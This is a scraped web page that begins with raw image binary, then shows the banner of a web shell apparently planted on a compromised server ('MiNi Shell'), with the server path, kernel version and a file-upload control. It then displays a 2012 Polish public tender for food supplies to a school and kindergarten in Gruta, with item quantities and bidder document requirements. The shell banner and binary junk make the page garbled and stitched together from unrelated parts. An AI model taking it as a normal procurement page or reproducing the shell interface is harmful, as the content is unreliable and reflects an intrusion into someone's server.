JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121113/447786-N-2012.html

<p class="kh_header"><b>Gruta: Dostawa artykułów żywnościowych do Zespołu Szkół w Grucie i Przedszkola Samorządowego w Mełnie</b><br>
<b>Numer ogłoszenia: 447786 - 2012; data zamieszczenia: 13.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Gruta 244, 86-330 Gruta, woj. kujawsko-pomorskie, tel. 56 468 31 21, faks 56 468 31 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:www.bip.gruta.akcessnet.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Zespołu Szkół w Grucie i Przedszkola Samorządowego w Mełnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Zespołu Szkół w Grucie, Gruta 70 i Przedszkola Samorządowego w Mełnie, Mełno 5.
Zamawiający dopuszcza składanie ofert częściowych.

CZĘŚĆ I

Dostawa oznaczona jako Część I świeże warzywa i owoce będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03221000-6, 03220000-9

L.p.	Nazwa artykułu 	Jednostka miary	Ilość
1.	Banany		
	Miesiąc I - III	kg	700
	Miesiąc IV - VI	kg	560
	Miesiąc IX - XII	kg	120
2.	Buraki ćwikłowe		
	Miesiąc I -III	kg	210
	Miesiąc IV - VI	kg	165
	Miesiąc VIII- XII	kg	80
3	Brzoskwinie		
	Miesiąc IV-VI	kg	45
	Miesiąc VIII-XII	kg	70
4.	Cebula		
	Miesiąc I-III	kg	100
	Miesiąc IV-VI	kg	60
	Miesiąc VIII-XII	kg	45
5.	Czosnek (główka)		
	Miesiąc I-III	szt.	36
	Miesiąc IV-VI	szt.	35
	Miesiąc VIII-XII	szt.	20
6.	Cytryny		
	Miesiąc I-III	kg	35
	Miesiąc IV-VI	kg	30
	Miesiąc VIII-XII	kg	10
7.	Fasola Jaś gruba	kg	85
8.	Fasola drobna	kg	55
9.
	Jabłka		
	Miesiąc I-III	kg	620
	Miesiąc IV-VI	kg	650
	Miesiąc VIII-XII	kg	300
10.	Kapusta kiszona		
	Miesiąc I-III	kg	170
	Miesiąc IV-VI	kg	135
	Miesiąc VIII-XII	kg	75
11.	Kapusta czerwona		
	Miesiąc I-III	kg	40
	Miesiąc IV-VI	kg	75
	Miesiąc VIII-XII	kg	20
12.	Kapusta biała		
	Miesiąc I - III	kg	250
	Miesiąc IV-VI	kg	270
	Miesiąc VIII-XII	kg	 60
13.	Kalafior sezon		
	Miesiąc V-VI	szt.	100
14.	Koper świeży		
	Miesiąc I-III	szt.	70
	Miesiąc IV-VI	szt.	50
	Miesiąc VII-XII	szt.	15
15.	Kapusta pekińska		
	Miesiąc I-III	szt.	50
	Miesiąc IV-VI	szt.	55
	Miesiąc VIII-XII	szt.	20
16.	Marchew		
	Miesiąc I-III	kg	380
	Miesiąc IV-VI	kg	290
	Miesiąc VIII-XII	kg	170
17.	Mandarynki		
	Miesiąc IV-VI	kg	  10
	Miesiąc IX-XII	kg	  70
18.	Nektarynki		
	Miesiąc IV-VI	kg	90
	Miesiąc VIII-XII	kg	100
19.	Ogórek kiszony		
	Miesiąc I-III	kg	130
	Miesiąc IV-VI	kg	60
	Miesiąc VIII-XII	kg	50
20.	Ogórek świeży 		
	Miesiąc V-VI	kg	100
	Miesiąc VIII-X	kg	65
21.	Papryka czerwona		
	Miesiąc I-III	kg	15
	Miesiąc IV-VI	kg	15
	Miesiąc VIII-XII	kg	10
22.	Pory		
	Miesiąc I-III	kg	55
	Miesiąc IV-VI	kg	50
	Miesiąc VIII-XII	kg	10
23.	Pomarańcze		
	Miesiąc I-III	kg	20
	Miesiąc IV-VI	kg	20
	Miesiąc XI-XII	kg	70
24.	Pieczarki		
	Miesiąc I-III	kg	20
	Miesiąc IV-VI	kg	25
	Miesiąc IX-XII	kg	25
25.	Pomidory		
	Miesiąc I-III	kg	30
	Miesiąc IV-VI	kg	130
	Miesiąc VIII-XI	kg	30
26	Pietruszka korzeń		
	Miesiąc I-III	kg	45
	Miesiąc IV-VI	kg	25
	Miesiąc IX-XII	kg	20
27.	Pietruszka zielona		
	Miesiąc I-III	szt.	70
	Miesiąc IV-VI	szt.	70
	Miesiąc VIII-XII	szt.	20
28.	Rzodkiewka (pęczek)		
	Miesiąc I-III	szt.	25
	Miesiąc IV-VI	szt.	45
	Miesiąc IX-XII	szt.	15
29.	Seler korzeń		
	Miesiąc I-III	kg	155
	Miesiąc IV-VI	kg	105
	Miesiąc VIII-XII	kg	  30
30.	Szczypior		
	Miesiąc I-III	szt.	40
	Miesiąc IV-VI	szt.	60
	Miesiąc VIII-XII	szt.	10
31.	Sałata lodowa (główka)		
	Miesiąc I-III	szt.	20
	Miesiąc IV-VI	szt.	45
	Miesiąc VIII-X	szt.	20
32.	Sałata zielona (główka)		
	Miesiąc IV-VI	szt.	45
	Miesiąc VIII-X	szt.	25
33.	Śliwy		
	Miesiąc VIII-IX	kg	15
34.	Truskawki		
	Miesiąc V-VII	kg	40
35.	Ziemniaki		
	Miesiąc I-III	kg	4500
	Miesiąc IV-VI	kg	4500
	Miesiąc VIII-XII	kg	2000

CZĘŚĆ II

Dostawa oznaczona jako Część II wyroby piekarskie będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15810000-9
L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.	Chleb orkiszowy (krojony 0,40 kg)	szt.	300
2.
	Chleb żytni (krojony 0,60 kg)	szt.	1000
3.	Chleb mieszany wieloziarnisty (0,50 kg)	szt.	150
4.
	Bułka pszenna (0,05 kg)	szt.	1500
5	Bułka z ziarnami (0,06 kg)	szt.	350
6.	Chleb pszenny (0,4 kg)	szt.	350
7.	Chleb graham (niekrojony 0,5 kg) 	szt.	100
8.
	Bułka tarta	kg	90
9.
	Drożdżówka	szt.	5000
10.
	Pączek	szt.	470

CZĘŚĆ III

Dostawa oznaczona jako Część III mrożone artykuły spożywcze będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15330000-0, 15220000-6  
L.p.	Nazwa artykułu 	Jednostka miary	Ilość
1.
	Brokuł  	kg	50
2.	Brukselka	kg	25
3.	Fasolka szparagowa zielona	kg 	15
4.
	Groszek zielony 	kg	15
5.
	Kalafior 	kg	70
6.	Lody w kubeczkach 150 ml	szt	100
7.
	Mieszanka warzywna                  7- składnikowa             	kg	230
8.	Mieszanka kompotowa 4 składnikowa	kg	150
9.
	Filet rybny z morszczuka	kg	250
10.
	Filet rybny z dorsza  	kg	350
12.	Truskawka	kg	30

CZĘŚĆ IV
Dostawa oznaczona jako Część IV jaja kurze świeże gramaturze 50g będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03142500-3


L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.
	Jaja kurze 50g	szt.	3000

CZĘŚĆ V
Dostawa oznaczona jako Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery:
Kod Wspólnego Słownika Zamówień (CPV): 15800000-6


L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.	Aromat do ciasta 10 ml	szt.	5
2	Ananas plastry w syropie - konserwowy 560-580 g	szt.	70
3.	Barszcz biały  instant 50 g	szt.	30
4.	Budyń b/c 40 g	szt.	150
5.	Brzoskwinie w syropie - konserwowe 820 g	szt.	90
6.	Ciastka kruche	kg	70
7.
	Cukier kryształ  1 kg	kg	450
8.	Cukier wanilinowy 20 g	szt.	250
9.	Cynamon 20 g	szt.	5
10.	Czekoladki dla dzieci z mlecznym nadzieniem 100 g	szt.	250
11.	Dżem niskosłodzony	kg	40
12.	Filety z makreli w oleju 170 g	szt.	65
13.	Filety z makreli  w sosie pomidorowym 170 g	szt.	60
14.	Galaretka owocowa 90 g	szt.	60
15.	Groszek konserwowy	kg	20
16.
	Groch połówki	kg	95
17.	Herbata expresowa  ( torebka 2g)	kg	6
18.	Herbata expresowa   wieloowcowa (50 torebek po 2g)	szt.	50
19.	Herbata expresowa  zielona (25 torebek po 2g)	Szt.	12
20.	Herbata expresowa miętowa (25 torebek po 2g)	szt.	25
21.	Herbata koperkowa (25 torebek po 2g)	szt.	30
22.
	Kukurydza konserwowa  	kg	25
23.	Kasza manna	kg	18
24.
	Kasza jęczmienna 1 kg	kg	120
26.
	Koncentrat pomidorowy (30%)	kg	80
27.	Kisiel (różne smaki) b/c 40g	szt.	65
28.	Kakao 100 % po 150 g	szt.	100
29.	Kawa inka  150 g	szt.	35
30.	Kasza gryczana	kg	15
31.
	Keczup łagodny 0,97 l	szt.	70
32.
	Koper susz 10 g	szt.	120
33.
	Liść laurowy 10g	szt.	30
34.	Marmolada wieloowocowa	kg	8
35.
	Mąka pszenna 1kg	kg	310
36.	Mąka ziemniaczana	kg	15
37.
	Majeranek 20g	szt.	55
38.
	Musztarda 0,97 l	szt.	27
39.
	Makaron (różne kształty) 1 kg	kg	400
40.	Makaron (różne kształty) z mąki razowej	kg	30
41.
	Majonez 	kg	80
42.	Miód naturalny	kg	12
43.
	Napój w kartoniku owocowy 0,21 l	szt.	4100
44.
	Napój niegazowany owocowy 	litr	160
45.
	Olej uniwersalny (opakowanie po 3 l)	litr	220
46.	Ogórek konserwowy 	kg	20
47.	Proszek do pieczenia 30 g	szt.	30
48.
	Przyprawa w płynie do zup i sosów  1l	litr	20
49.
	Przyprawa warzywna do zup i sosów 	kg	100
50.
	Papryka mielona słodka 20g	szt.	100
51.
	Pieprz naturalny mielony 20g	szt.	110
52.
	Pietruszka nać, susz 10g	szt.	50
53.	Płatki kukurydziane 	kg	40
54.	Płatki czekoladowe z pełnym ziarnem 	kg	50
55.	Płatki owsiane	kg	30
56.
	Przyprawa do drobiu 20g	szt.	90
57.	Przyprawa do mięsa wieprzowego 20 g	szt.	35
58.	Przyprawa do piernika 20 g	szt. 	5
59.
	Ryż 	kg	200
60.	Rodzynki 200 g	szt. 	20
61.
	Sok przecierowy  owocowo -warzywny 250 ml	szt.	1300
62.	Soki owocowy (różne smaki) 2l	szt.	250
63.
	Sól jodowana 1 kg	kg	36
64.
	Syrop owocowy (różne smaki) 5 l	szt.	85
65.	Ocet winny	litr	10
66.	Woda mineralna niegazowana 1,5 l (o ogólnej zawartości składników rozpuszczalnych nie mniej niż 600 mg/l	szt.	205
67.
	Ziele angielskie 20g	szt.	40
68.	Zioła prowansalskie 20 g	szt.	12
69.	Żelatyna spożywcza 20 g	szt.	10
			
CZĘŚĆ VI
Dostawa oznaczona jako Część VI mięso świeże, wędliny i drób:
Kod Wspólnego Słownika Zamówień (CPV): 15100000-9

L.p.	Nazwa artykułu	Jednostka miary	Ilość

	I  Mięso świeże wieprzowe i wołowe		
1.
	Łopatka wieprzowa kl.I	kg	300
2.
	Karkówka wieprzowa b/k kl.I	kg	50
3	Szynka wieprzowa b/k  kl. I	kg	50
4.
	Schab wieprzowy  b/k kl. I	kg	50
5.
	Wątroba wieprzowa 	kg	30
6.	Biodrówka wieprzowa  kl.I	kg	20
7	Mięso gulaszowe  wieprzowe kl.I	kg	150
8	Mięso wołowe - łopatka   kl. I	kg	80

	II Wędliny świeże		
1.
	Kiełbasa  śląska	kg	200
2.
	Kiełbasa wiejska	kg	50
3.	Szynka wieprzowa gotowana	kg	75
4.	Polędwica parzona	kg	35
	III Mięso drobiowe 
	Świeże	
			
1.
	Filet z kurczaka 	kg	400
2.	Fiolet z indyka	kg	80
3.
	Kurczak 	kg	80
4.
	Podudzie z kurczaka	kg	180 
5.
	Skrzydło z kurczaka	kg	150
7.	Udo z indyka trybowane b/k	kg	400
8.
	Wątróbka drobiowa	kg	50
9.	Żołądki drobiowe	kg	20
			
	CZĘŚĆ VII		
Dostawa oznaczona jako Część VII mleko i produkty mleczarskie:
Kod Wspólnego Słownika Zamówień (CPV): 15500000-3

L.p.	Nazwa artykułu 	Jednostka miary	Ilość
1.	Mleko krowie w kartonie 2% tł. op. 1 l 	litr	2000 
2.
	Mleko krowie w kartonie  3,2% tł.  op. 1 l	litr	300
3.
	Jogurt owocowy 150 g (różne smaki)	szt.	3000
4.	Jogurt naturalny 150 g 	szt.	30
5.
	Masło ekstra 82% tł. 200 g	szt.	500
6.
	Ser żółty edamski	kg	65
7.	Ser topiony kremowy 100 g	szt.	150
8.	Ser biały twarogowy półtłusty	kg	400
9.
	Serek homogenizowany owocowy 150 g (różne smaki)	szt.	1500
10.
	Śmietana 18% tł.	litr	80
11.	Śmietana 30%tł. 0,5 l	szt.	40


1.	Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do siedziby  Zespołu Szkół w Grucie, Gruta 70 oraz Przedszkola Samorządowego w Mełnie, Mełno 5. 
2.	Każdy z produktów powinien być dostarczony w wymaganych opakowaniach.
3.	 Cykliczne dostawy  będą realizowane następująco: 
-	Część I świeże warzywa i owoce - w pierwszym dniu od złożenia zamówienia (zamówienie będzie składane do godz. 10.00). od poniedziałku do piątku w godzinach od  7.00 do   8.00.
-	 Część II  wyroby piekarskie - codziennie w pierwszym dniu od złożenia zamówienia (zamówienie będzie składane do godz. 10.00) od poniedziałku do  piątku w godz. od 6.00   do  7.00.
-	 Część III  mrożone artykuły spożywcze - w  drugim dniu  od złożenia zamówienia 
od poniedziałku do piątku w godz. od 7.00 do 14.00.
-	Część IV jaja kurze świeże - w drugim dniu  od złożenia zamówienia od poniedziałku 
do piątku w godz. od 7.00 do 14.00.
-	Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery - w drugim     dniu od złożenia zamówienia od poniedziałku do piątku w godz. od 7.00 do 14.00.
-	 Część VI  mięso świeże, wędliny i drób - w pierwszym dniu  od złożenia zamówienia (zamówienie będzie składane do godz. 10.00)   od poniedziałku do piątku w godz. od 7.00 do 12.00.
-	Część VII  mleko i produkty mleczarskie -  w  pierwszym  dniu od złożenia zamówienia (zamówienie będzie składane do godz. 10.00) od poniedziałku do piątku  do godz.  7.00. do 8.00.
4.	Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane produkty z podaniem ilości. 
5.	 Produkty muszą być najwyższej jakości i spełniać być dostarczone w ich początkowym okresie gwarancji.  
6.	 W przypadkach, w których Zamawiający użył nazw własnych dla określenia walorów smakowych produktów, Zamawiający dopuszcza produkty o walorach smakowych takich samych lub wyższych. 
7.	 Wykonawca musi zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru zgodnie z wymogami HCCP. Każda dostawa towaru wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8.	 Wykonawca użyczy nieodpłatnie  potrzebnych pojemników przy każdorazowej dostawie towaru do siedziby Zamawiającego na okres do następnej dostawy. 
9.	 Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie. 




10.	Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z    tytułu zmniejszenia      zamówienia.
11.	 Zamawiający zastrzega  możliwość zamiany ilości poszczególnego asortymentu. 
12.	 Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanego towaru i dostarczenia nowej partii do siedziby  Zamawiającego  w dniu złożenia reklamacji.
13.	Do składania zamówień Zamawiający upoważni wybranych  pracowników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  dopuszcza udzielenie ofert uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych w ilości do 50% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.10.00-6, 03.22.00.00-9, 15.81.00.00-9, 15.33.00.00-0, 15.22.00.00-6, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca  składa oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że zostały wykonane lub są wykonywane należycie w okresie trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie,  co najmniej dwie dostawy artykułów żywnościowych - wzór załącznik nr  3  do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca  oświadczy, że dysponuje odpowiednim potencjałem technicznym  do realizacji zadania  - wzór załącznik  nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca  oświadczy,   osobami zdolnymi do wykonania zamówienia - wzór załącznik  nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca oświadczy, że znajduje się w sytuacji  ekonomicznej i finansowej  zapewniającej  wykonanie zamówienia  -  wzór załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

